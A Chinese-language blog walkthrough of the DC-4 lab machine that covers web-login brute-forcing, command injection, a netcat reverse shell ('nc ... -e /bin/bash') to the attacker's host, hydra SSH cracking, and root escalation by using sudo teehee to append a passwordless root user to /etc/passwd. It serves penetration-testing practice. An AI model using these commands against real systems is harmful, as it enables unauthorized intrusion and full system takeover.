DC-4靶机学习

1.日常扫描局域网存活主机


发现目标:192.168.43.30
开启了80端口和22端口,80端口进去是一个登陆框,可以尝试爆破,随手整了个top500

2.爆破一把梭


登陆窗口,试了万能密码,不行,于是想到暴力破解

梭出来了,admin:happy

3.命令执行


抓包

登陆进去发现可以执行系统命令,于是抓包,实现执行任意命令(在所拥有的权限之下)

4.nc反弹shell

先监听好

nc -lvvp 8001

然后执行反弹

nc 192.168.43.164 8001 -e /bin/bash



弹回来了,随手看下whoami,顺便翻翻目录下有什么东西
home目录下有三个用户

jim
sam
charles

缺几个密码,2333

在/home/jim/backups/下发现一个可能是旧密码的密码备份文件,于是拿下来,拿去爆破

5.hydra破解ssh密码


密码到手,ssh连接进去

6.谜之邮件


在这里有一封邮件,我居然,居然没注意就看过去了。。。。裂开(还是要细心啊)


后面又看了几遍,终于看到邮件了,简直热泪盈眶,邮件里面是一个用户的密码【自己出去浪可还行】
切换用户过去

我在这就卡住了,到底还是太菜了

7.???没错,是我看不懂的提权

https://www.cnblogs.com/zaqzzz/p/12075132.html
https://www.jianshu.com/p/ac10a4149eef
sudo -l 显示出自己(执行 sudo 的使用者)的权限

提权

charles@dc-4:/home/jim$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换用户,getflag

8.总结

这里提权各有优劣吧,一个是利用定时任务反弹root权限
另一个取巧直接添加一个root用户【妙啊】

原文地址:https://www.cnblogs.com/mke2fs/p/12988838.html